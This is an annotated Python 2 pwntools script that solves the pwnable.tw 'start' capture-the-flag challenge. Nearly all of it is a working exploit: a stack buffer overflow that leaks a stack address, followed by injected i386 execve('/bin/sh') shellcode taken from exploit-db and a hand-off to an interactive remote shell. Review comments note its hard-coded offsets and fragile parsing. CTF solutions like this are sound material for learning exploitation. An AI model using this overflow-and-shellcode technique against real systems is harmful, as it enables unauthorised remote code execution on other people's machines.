# requires https://github.com/Gallopsled/pwntools
import sys
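# Solution script for a CTF exercise (the usage text names chall.pwnable.tw).
# Python 2 only: it relies on the print statement and on the 'hex' str codec.
#
# Usage guard: exactly two arguments (host, port) are required. The body of
# this `if` must be indented, otherwise the file does not parse.
if len(sys.argv) != 3:
    print 'Usage: python pwnable-start.py <host> <port>'
    print
    print 'Example: python pwnable-start.py chall.pwnable.tw 10000'
    sys.exit(1)
# NOTE(review): the wildcard import hides where names come from. remote,
# context, asm and sleep are not defined in this file, so they must be
# supplied by pwntools.
from pwn import *
context(arch = 'i386', os = 'linux')
r = remote(sys.argv[1], int(sys.argv[2]))
# Stage 1: query stack address.
# The payload is 20 filler bytes followed by a 4-byte address. The address is
# written big-endian here and reversed to little-endian before sending.
# NOTE(review): the 20-byte offset and the address are hard-coded for one
# specific target binary; nothing in this file verifies them.
print 'Querying stack address...'
addr_func_write = '\x08\x04\x80\x87'
payload = ('a' * 20) + addr_func_write[::-1]
print 'Sending {} bytes...'.format(len(payload))
r.send(payload)
# NOTE(review): a fixed 2-second sleep is the only synchronisation, and recv()
# may return fewer than 24 bytes. In that case the slice below is short or
# empty and the int(..., 16) conversion raises.
sleep(2)
response = r.recv()
print 'Received {} bytes!'.format(len(response))
# Bytes 20..23 of the reply are read as a little-endian 32-bit value, reduced
# by 4, and kept as a raw big-endian byte string. The -4 adjustment is
# specific to the target and cannot be derived from this file.
# NOTE(review): hex(...)[2:].decode('hex') is fragile. It fails when the value
# has an odd number of hex digits or when hex() appends a trailing 'L' (a
# Python 2 long).
stack_pointer = hex(int(response[20:24][::-1].encode('hex'), 16) - 4)[2:].decode('hex')
print 'Stack Pointer: 0x{}'.format(stack_pointer.encode('hex'))
# Stage 2: exploit.
# The second address is stack_pointer + 24, which equals the 20 filler bytes
# plus the 4 address bytes that precede shell_code in the payload below.
# Presumably the payload is stored starting at stack_pointer -- confirm
# against the target binary.
# NOTE(review): this approach appears to depend on the target leaking a stack
# address and on that memory being executable. A build with a non-executable
# stack would not run the injected bytes.
print 'Exploiting...'
shell_code_addr = hex(int(stack_pointer.encode('hex'), 16) + 20 + 4)[2:].decode('hex')
print 'Shell Code Pointer: 0x{}'.format(shell_code_addr.encode('hex'))
# Taken from: https://www.exploit-db.com/exploits/42428/
# NOTE(review): these are opaque bytes copied from a third-party listing.
# Disassemble and review them before running the script.
shell_code = '\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'
# Assembled for i386 (see context above): push a fixed address, then ret to it.
# Going by the variable name, this is presumably the binary's exit path --
# confirm.
exit_code = asm('push 0x804809d\nret')
payload = ('a' * 20) + shell_code_addr[::-1] + shell_code + exit_code
print 'Sending {} bytes...'.format(len(payload))
r.send(payload)
sleep(2)
# Hand the connection over to the terminal.
r.interactive()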